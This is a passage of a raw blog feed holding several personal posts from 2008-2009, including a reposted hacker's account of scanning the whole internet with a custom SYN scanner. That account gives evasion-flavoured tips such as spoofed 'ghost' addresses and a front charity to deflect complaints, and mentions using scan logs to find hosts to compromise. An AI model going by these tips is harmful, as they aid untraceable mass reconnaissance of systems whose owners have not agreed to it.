src="http://3.bp.blogspot.com/_zPPJaS3LoQM/SXA5ry-FAzI/AAAAAAAAAlQ/L0C-anNc1v4/s200/m+and+s.jpg" alt="" id="BLOGGER_PHOTO_ID_5291792986739639090" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_zPPJaS3LoQM/SXA5r8gx8LI/AAAAAAAAAlI/qEKHu5yFHW0/s1600-h/estee-lauder.jpg"&gt;&lt;img style="cursor: pointer; width: 200px; height: 41px;" src="http://3.bp.blogspot.com/_zPPJaS3LoQM/SXA5r8gx8LI/AAAAAAAAAlI/qEKHu5yFHW0/s200/estee-lauder.jpg" alt="" id="BLOGGER_PHOTO_ID_5291792989301108914" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_zPPJaS3LoQM/SXA06MwPhUI/AAAAAAAAAjI/Z10JzyUa6n0/s1600-h/coke.gif"&gt;&lt;img style="cursor: pointer; width: 100px; height: 101px;" src="http://2.bp.blogspot.com/_zPPJaS3LoQM/SXA06MwPhUI/AAAAAAAAAjI/Z10JzyUa6n0/s200/coke.gif" alt="" id="BLOGGER_PHOTO_ID_5291787736620959042" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_zPPJaS3LoQM/SXA1h7-Tt6I/AAAAAAAAAkQ/8KO6R-2StM8/s1600-h/starbucks2.gif"&gt;&lt;img style="cursor: pointer; width: 103px; height: 98px;" src="http://1.bp.blogspot.com/_zPPJaS3LoQM/SXA1h7-Tt6I/AAAAAAAAAkQ/8KO6R-2StM8/s200/starbucks2.gif" alt="" id="BLOGGER_PHOTO_ID_5291788419311318946" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;More brand lists to be boycotted &lt;a href="http://www.inminds.com/boycott-brands.html"&gt;here.&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-4147650901429899401?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/4147650901429899401/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=4147650901429899401' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/4147650901429899401'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/4147650901429899401'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2009/01/boycott-israel-campaign.html' title='Boycott Israel Campaign'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_zPPJaS3LoQM/SXA3OieGIqI/AAAAAAAAAkw/E7s_O_uN5ZM/s72-c/boycott-israel-275x275.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-6085818530504127444</id><published>2009-01-11T12:27:00.006+08:00</published><updated>2009-02-06T00:44:04.029+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='LostSoul'/><title type='text'>Bed of Roses</title><content type='html'>&lt;a style="" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_zPPJaS3LoQM/SWl1t5Y2DmI/AAAAAAAAAiU/9cIyostALnw/s1600-h/bed_of_roses_package.gif"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 150px;" src="http://1.bp.blogspot.com/_zPPJaS3LoQM/SWl1t5Y2DmI/AAAAAAAAAiU/9cIyostALnw/s200/bed_of_roses_package.gif" alt="" id="BLOGGER_PHOTO_ID_5289888668682948194" border="0" /&gt;&lt;/a&gt;Al-Fatihah...&lt;br /&gt;&lt;br /&gt;Today, I missed all the wonderful journey and experience with my brother. He thought me everything he could. Sometimes we played &lt;a href="http://en.wikipedia.org/wiki/Guitar" title="Guitar"&gt;guitar&lt;/a&gt; together and sing a song. Our favorites song was Bed of Roses by Jon Bon Jovi that we dedicated to somebody important on his life. I misses you so much Bro, May Allah put you with all the Solehin. Amin.&lt;br /&gt;&lt;br /&gt;"&lt;b&gt;Bed of Roses&lt;/b&gt;" is a &lt;a href="http://en.wikipedia.org/wiki/Rock_%28music%29" title="Rock (music)" class="mw-redirect"&gt;rock song&lt;/a&gt; released by &lt;a href="http://en.wikipedia.org/wiki/Bon_Jovi" title="Bon Jovi"&gt;Bon Jovi&lt;/a&gt; in &lt;a href="http://en.wikipedia.org/wiki/1993_in_music" title="1993 in music"&gt;1993&lt;/a&gt;, taken from the album &lt;i&gt;&lt;a href="http://en.wikipedia.org/wiki/Keep_the_Faith" title="Keep the Faith"&gt;Keep the Faith&lt;/a&gt;&lt;/i&gt;. The song's &lt;a href="http://en.wikipedia.org/wiki/Power_ballad" title="Power ballad"&gt;power ballad&lt;/a&gt; style made it a worldwide hit, and it demonstrated the band's new, more mature sound after their success as a &lt;a href="http://en.wikipedia.org/wiki/Glam_metal" title="Glam metal"&gt;glam metal&lt;/a&gt; band in the 80's. Released as a successful single in 1993, it reached #10 on the &lt;a href="http://en.wikipedia.org/wiki/Billboard_Hot_100" title="Billboard Hot 100"&gt;Billboard Hot 100&lt;/a&gt;, #13 in the &lt;a href="http://en.wikipedia.org/wiki/UK_Singles_Chart" title="UK Singles Chart"&gt;UK Top 40&lt;/a&gt; and #10 in the &lt;a href="http://en.wikipedia.org/wiki/Media_Control_Charts" title="Media Control Charts"&gt;German Top 100&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Jon Bon Jovi wrote the song in a hotel room while suffering from a hangover, and the song reflects his feelings at the time. The song contains drawn out guitar riffs and soft piano playing, combined with emotive and powerful vocals by Jon to create a power ballad love song.The line"as I dream about movies they won't make of me when I am dead" is indicative of the central theme of rugged existence interwoven with soaring hopes at the same time.&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/eikOVtA9lEo&amp;amp;color1=0xb1b1b1&amp;amp;color2=0xcfcfcf&amp;amp;hl=en&amp;amp;feature=player_embedded&amp;amp;fs=1"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;embed src="http://www.youtube.com/v/eikOVtA9lEo&amp;amp;color1=0xb1b1b1&amp;amp;color2=0xcfcfcf&amp;amp;hl=en&amp;amp;feature=player_embedded&amp;amp;fs=1" type="application/x-shockwave-flash" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;a href="http://en.wikipedia.org/wiki/Jon_Bon_Jovi" title="Jon Bon Jovi"&gt;&lt;br /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-6085818530504127444?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/6085818530504127444/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=6085818530504127444' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/6085818530504127444'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/6085818530504127444'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2009/01/bed-of-roses.html' title='Bed of Roses'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_zPPJaS3LoQM/SWl1t5Y2DmI/AAAAAAAAAiU/9cIyostALnw/s72-c/bed_of_roses_package.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-5822826620037426271</id><published>2009-01-02T13:33:00.005+08:00</published><updated>2009-01-02T14:26:56.944+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><category scheme='http://www.blogger.com/atom/ns#' term='News'/><category scheme='http://www.blogger.com/atom/ns#' term='uDc'/><title type='text'>Some old story for 2009 PLAN</title><content type='html'>&lt;a style="" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_zPPJaS3LoQM/SV2qrW7GALI/AAAAAAAAAgc/fR28jXsIN8o/s1600-h/teso.gif"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 74px;" src="http://3.bp.blogspot.com/_zPPJaS3LoQM/SV2qrW7GALI/AAAAAAAAAgc/fR28jXsIN8o/s200/teso.gif" alt="" id="BLOGGER_PHOTO_ID_5286569199467364530" border="0" /&gt;&lt;/a&gt;I was thinking what is the best posting to open my year 2009 blog. I came up with an idea to review or flashback some of good stories out there related to &lt;a href="http://en.wikipedia.org/wiki/Cyber-"&gt;Cyber&lt;/a&gt; World. I hope posted below would give you some picture that &lt;a href="http://en.wikipedia.org/wiki/Hacker"&gt;HACKERS &lt;/a&gt;are actually helping you with their own ways and styles. They are actually knows what is happening on the entire internet. I wish you all &lt;span style="font-weight: bold;"&gt;"Happy New Year 2009"&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Before joining THC I was doing research for Team-Teso. In 2000 one of our problems at Teso was that many script kiddies entered the arena&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;and started setting up DDoS hosts and owning like mad. Hacking became mainstream.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;At Teso we did not like script kiddies and we abhorred those doing DDoS. A small group of Teso and some friends reverse engineered the backdoors and started scanning for them. Our objective was to discourage script kiddies and stop DDoS attacks (by removing the DDoS agents).&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong style="font-style: italic;"&gt;Techniques&lt;/strong&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;We developed a new scanner (called 'bscan', not published but a handful of people had it) that was capable of scanning&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;the internet.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;The main features of bscan were:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;- Raw SYN scanner. Full TCP/IP stack in userland.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;- Using ghost IP and ghost MAC (untraceable)&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;- Modular. We developed loadable modules for telnet handshake, bind, http (HEAD / HTTP/1.0), ...&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;- Sending out 50.000 or more syn packets per second.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;- Running on linux, sunos/solaris and bsd.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;In short the scanner was capable of scanning the entire Internet (0.0.0.0 - 239.255.255.255). The scanner retrieved all Web Server versions&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;or telnet banners within hours.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Fyodor's nmap was developed for a different reason. The features of nmap are far superior to bscan. Bscan was a tool and nmap is a professional application.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong style="font-style: italic;"&gt;Results&lt;/strong&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;All this is history now and I think that 7 years after the development the time has come to share some of the stuff that we learned&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;while scanning the Internet:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;table style="font-style: italic;" valign="TOP" border="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td valign="top"&gt;1.&lt;/td&gt;&lt;td&gt;The Internet is full of hosts that do not comply with the RFC.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top"&gt;2.&lt;/td&gt;&lt;td&gt;There are hosts on the Internet that keep sending ACK packets for hours even if you send back FIN, RST or ICMP error messages. They just wont stop sending!&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top"&gt;3.&lt;/td&gt;&lt;td&gt;Sometimes you send a SYN to one host and you get the SYN/ACK back from a different host (asymmetric NAT).&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top"&gt;4.&lt;/td&gt;&lt;td&gt;There are entire class A networks with no hosts in them at all (The Black Holes of the Internet).&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top"&gt;5.&lt;/td&gt;&lt;td&gt;Never scan sequential. If a remote class B or class C is hit with 50k SYNCs per second the serving router of the target network will start sending out ARP requests to resolve the MAC of all these hosts. ARP requests are broadcast messages. This will overload some hosts on the target 'local' network which will crash or not respond for several seconds while processing the ARP requests. You will miss those hosts. Scan 'spread spectrum' and increment the IP by 256 or a similar value.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top"&gt;6.&lt;/td&gt;&lt;td&gt;The first syn packet is often lost. When scanning 10-20 class A networks in 'spread spectrum mode (-X option in bscan) then the router of a large network (e.g. class B) still has to resolve several hundred ARP entries per second. Some routers can not handle this and will start dropping SYN packets if the MAC is not known and can not be resolved because the router is already busy resolving other MAC addresses.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top"&gt;7.&lt;/td&gt;&lt;td&gt;Coordinate with your people that you are the only one scanning the Internet. Same reason as above: If two people scan at the same time the target hosts have to process to many ARP requests and both of you will miss hosts. &lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top"&gt;8.&lt;/td&gt;&lt;td&gt;Never wait longer than 3 seconds for a host to complete. If it takes longer than 3 seconds for a host to reply you are not interested in owning that host anyway.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top"&gt;9.&lt;/td&gt;&lt;td&gt;Be kind to other administrators. We set up a charity ("The Institute for Internet Statistics") to have a reasonable explanation for any IT administrator who complained about our scanning activities. &lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;The scanner was usually started on 5-10 Internet hosts in parallel. A big thanks at this point to the IT Administrators of the&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;various universities in Germany who let us use their hosts for scanning (legally!).&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;A typical TCP port scan of the Internet took between 8-16 hours.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong style="font-style: italic;"&gt;Stories&lt;/strong&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;There was a nice side effect of cleaning the internet from script kiddies and their backdoors: Teso had a full list of all&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;server versions of all hosts on the Internet. No longer had team teso to scan for vulnerable hosts. We just looked them up in our&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;log files.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;One day one of the German hackers who helped Teso came home drunk and decided to start another scan for a script kiddie&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;backdoor that was running on TCP port 33645. He initiated a scan and set source port to 443 and destination port&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;to 33645. The morning after (and being sober again) he saw that various security mailing lists discussed a new&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;0-day vulnerability against HTTPS (port 443). Apparently someone was scanning with massive speed the HTTPS ports on&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;the Internet. He looked again of what scan he started the night before: He mistakenly swapped source and destination port while drunk and scanned for port 443 instead for port 33465.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;These mails can still be found on the archives of various mailing lists around xmas 2002.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Lesson learned: Do not drink &amp;amp; hack.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;We were not the only ones who scanned the Internet. We heart of an Israeli research group who did it in 1998.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;In 2002/2003 Dan Kaminsky published another tool called scanrand. His tool is public. Try it.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong style="font-style: italic;"&gt;Final Notes&lt;/strong&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;These days bscan is old and not up to date anymore.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Whatever you do make sure it's legal and does not cause trouble to other people.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;regards,&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;someone&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-5822826620037426271?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/5822826620037426271/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=5822826620037426271' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/5822826620037426271'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/5822826620037426271'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2009/01/some-old-story-for-2009-plan.html' title='Some old story for 2009 PLAN'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_zPPJaS3LoQM/SV2qrW7GALI/AAAAAAAAAgc/fR28jXsIN8o/s72-c/teso.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-4071524292851663175</id><published>2008-12-29T10:01:00.001+08:00</published><updated>2009-01-02T14:13:15.731+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>Awal Muharram</title><content type='html'>&lt;a style="" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_zPPJaS3LoQM/SV2vTsTb-AI/AAAAAAAAAgk/pZMsTnpNEXs/s1600-h/islam11.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 150px;" src="http://1.bp.blogspot.com/_zPPJaS3LoQM/SV2vTsTb-AI/AAAAAAAAAgk/pZMsTnpNEXs/s200/islam11.jpg" alt="" id="BLOGGER_PHOTO_ID_5286574290447890434" border="0" /&gt;&lt;/a&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;Assalamualaikum WBT to all muslim bro and sis. Today 1429H.. Wish u guys happy &lt;span style="font-weight: bold;"&gt;New Year Maal Hijrah&lt;/span&gt; celebration. It's a public holiday in Malaysia. I wish tht for this coming new year all the muslimin and muslimat wil be blessed with Allah's Rahmat. Insha Allah. My resolution? To be a better Muslim of course :)&lt;/span&gt;&lt;p style="color: rgb(0, 0, 0);"&gt;&lt;span style="color: rgb(0, 51, 153);"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;I would like to quote some info from a web i found..&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style="font-style: italic; color: rgb(0, 0, 0);"&gt;&lt;span style="color: rgb(0, 51, 153);"&gt;"The Islamic Calendar, which is based purely on lunar cycles, was first introduced in 638 C.E. by the close companion of the Prophet (PBUH) and the second Caliph, `Umar ibn Al-KHaTTab (592-644 C.E.) RAA. He did it in an attempt to rationalize the various, at times conflicting, dating systems used during his time. `Umar consulted with his advisors on the starting date of the new Muslim chronology. It was finally agreed that the most appropriate reference point for the Islamic calendar was the Hijrah. The actual starting date for the Calendar was chosen (on the basis of purely lunar years, counting backwards) to be the first day of the first month (1 MuHarram) of the year of the Hijrah. The Islamic (Hijri) calendar (with dates that fall within the Muslim Era) is usually abbreviated A.H. in Western languages from the latinized Anno Hegirae, "in the year of the Hegira". MuHarram 1, 1 A.H. corresponds to July 16, 622 C.E. &lt;/span&gt;&lt;/p&gt; &lt;p style="font-style: italic; color: rgb(0, 0, 0);"&gt;&lt;span style="color: rgb(0, 51, 153);"&gt;The Hijrah, which chronicles the migration of the Prophet Muhammad (PBUH) from Makkah to Madinah in September 622 C.E., is the central historical event of early Islam. It led to the foundation of the first Muslim city-state, a turning point in Islamic and world history. &lt;/span&gt; &lt;/p&gt;&lt;p style="color: rgb(0, 0, 0);"&gt;&lt;span style="color: rgb(0, 51, 153);"&gt;&lt;span style="font-style: italic;"&gt;To Muslims, the Hijri calendar is not just a sentimental system of time reckoning and dating important religious events, e.g., Siyaam (fasting) and Hajj (pilgrimage to Makkah). It has a much deeper religious and historical significance."&lt;/span&gt; &lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-4071524292851663175?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/4071524292851663175/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=4071524292851663175' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/4071524292851663175'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/4071524292851663175'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2008/12/awal-muharram.html' title='Awal Muharram'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_zPPJaS3LoQM/SV2vTsTb-AI/AAAAAAAAAgk/pZMsTnpNEXs/s72-c/islam11.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-2285089001667124145</id><published>2008-12-23T23:09:00.002+08:00</published><updated>2008-12-23T23:22:01.824+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>Physical Security Lessons</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_zPPJaS3LoQM/SVEB7nyBwzI/AAAAAAAAAgQ/c5u3ojGcvAU/s1600-h/policeman+and+hacker.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 162px; height: 200px;" src="http://3.bp.blogspot.com/_zPPJaS3LoQM/SVEB7nyBwzI/AAAAAAAAAgQ/c5u3ojGcvAU/s200/policeman+and+hacker.jpg" alt="" id="BLOGGER_PHOTO_ID_5283005961685025586" border="0" /&gt;&lt;/a&gt;The newest CSO magazine featured a great article by Bill Brenner on jewelry store security.  It's online via PCWorld at &lt;a href="http://www.pcworld.com/businesscenter/article/153959/how_tech_caught_the_jewelry_thief.html"&gt;How Tech Caught the Jewelry Thief&lt;/a&gt;.  I'd like to cite several excerpts and relate them to digital security.&lt;br /&gt;&lt;br /&gt;&lt;i&gt;It used to be that after a robbery, the police would review a surveillance tape for clues into who broke in, at what time and what the bad guys looked like. Since the thieves would be long gone by the time the tape was reviewed, there would often be little the authorities could do about it.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;That sounds like a traditional digital forensics scenario, with the problem that it can be difficult to apprehend criminals well after the crime occurs.&lt;br /&gt;&lt;br /&gt;&lt;i&gt;But thanks to 21st-Century technology, the crooks are being &lt;b&gt;watched&lt;/b&gt; in real time and, as a result, getting caught a lot more often.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Notice the word "watched" -- this frames the problem as one of faster detection and response.&lt;br /&gt;&lt;br /&gt;&lt;i&gt;In this Q&amp;amp;A, Dennis Thomas, regional loss prevention manager and certified field trainer at Zale Corp., explains how the retailer's IT operation is playing an increasingly important role in the physical security effort...&lt;br /&gt;&lt;br /&gt;CSO: Your organization seems to be fighting back in more of a real-time fashion, as opposed to surveillance camera recordings where you would see the burglary take place long after the fact.&lt;br /&gt;&lt;br /&gt;Thomas: Keep in mind, in the old days a crime could occur in a store with the employees there and they wouldn't always notice what was happening. &lt;b&gt;With remote technology our trained operators at the command center&lt;/b&gt; can observe a theft in progress and notify the police in real time with important time-sensitive details like description, method of operation and where the merchandise is on the person. The police in turn are a lot more successful in &lt;b&gt;making an arrest&lt;/b&gt; than they were five years ago. &lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Two points: first, Zale Corp. uses a &lt;b&gt;centralize and specialize&lt;/b&gt; method where experts provide a service to the entire company, remotely.  Second, the result is &lt;b&gt;removing a threat&lt;/b&gt; via police arrest.&lt;br /&gt;&lt;br /&gt;&lt;i&gt;The real benefit is the increase in time notification. &lt;b&gt;Let's say the operator doesn't immediately see the theft as it's happening. They can still e-mail camera images to the police&lt;/b&gt;, which is still faster than trying to pull video off an old VCR tape.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;This sounds like Network Security Monitoring, where &lt;b&gt;prevention eventually fails&lt;/b&gt; and sometimes &lt;b&gt;intruders are smarter than you&lt;/b&gt;.  When you know you were victimized, however, you can review your forensic evidence &lt;b&gt;quickly and efficiently&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;&lt;i&gt;CSO: Who are you using as a vendor to operate the command center?&lt;br /&gt;&lt;br /&gt;Thomas: &lt;b&gt;We own and operate our own command center.&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;CSO: So you built the whole thing in house.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Zale Corp. is big enough to staff their own centralized "security operations center (SOC)". Smaller players might want to outsource, but I see more large companies building their own.&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Thomas: Exactly. We worked with a local vendor to &lt;b&gt;develop the technology and devised everything right down to the terminology&lt;/b&gt; that the operators use to communicate with the stores.&lt;br /&gt;&lt;br /&gt;CSO: Did your command center develop gradually and organically, or was it based off of one big plan from the outset?&lt;br /&gt;&lt;br /&gt;Thomas: It was a &lt;b&gt;gradual process that took years&lt;/b&gt;. There were three phases: developing the technology, implementing the technology and further enhancing the system once it was operational, working out the kinks. We had our challenges as we basically ventured into uncharted territory but the technology was proven and successfully implemented the vision into the business.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;No one does this correctly from day one.  Developing an effective security operation is a multi-year process.&lt;br /&gt;&lt;br /&gt;&lt;i&gt;CSO: How much has this cut down on the time it takes on average to either catch the thief or at least solve a crime?&lt;br /&gt;&lt;br /&gt;Thomas: I'll give you two statistics: First: The corporation has achieved &lt;b&gt;record shrink lows&lt;/b&gt; for the last seven consecutive years. Second: a significant reduction in shrink [lost merchandise/revenue] as a result of burglaries. You can directly attribute that to the technology we've put in place.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;This is a crucial point: Zale Corp's security department has performed a &lt;b&gt;cost-benefit analysis&lt;/b&gt; that demonstrates how their security operation is saving money. First they had to quanitfy loss, and now they are showing how their team has reduced that loss. Note that the security team isn't "making money;" they are &lt;b&gt;preventing loss&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;&lt;i&gt;There has been a significant increase in the number of criminals apprehended because we can get three to five cruisers out there immediately, because the police know if Zales calls, we are seeing a burglary unfolding before our eyes. We are able to &lt;b&gt;verify to them immediately that it's not a false alarm.&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Zale Corp. is avoiding the problem facing many MSSPs. Many MSSPs just call the customer when one of a million Snort alerts appear on 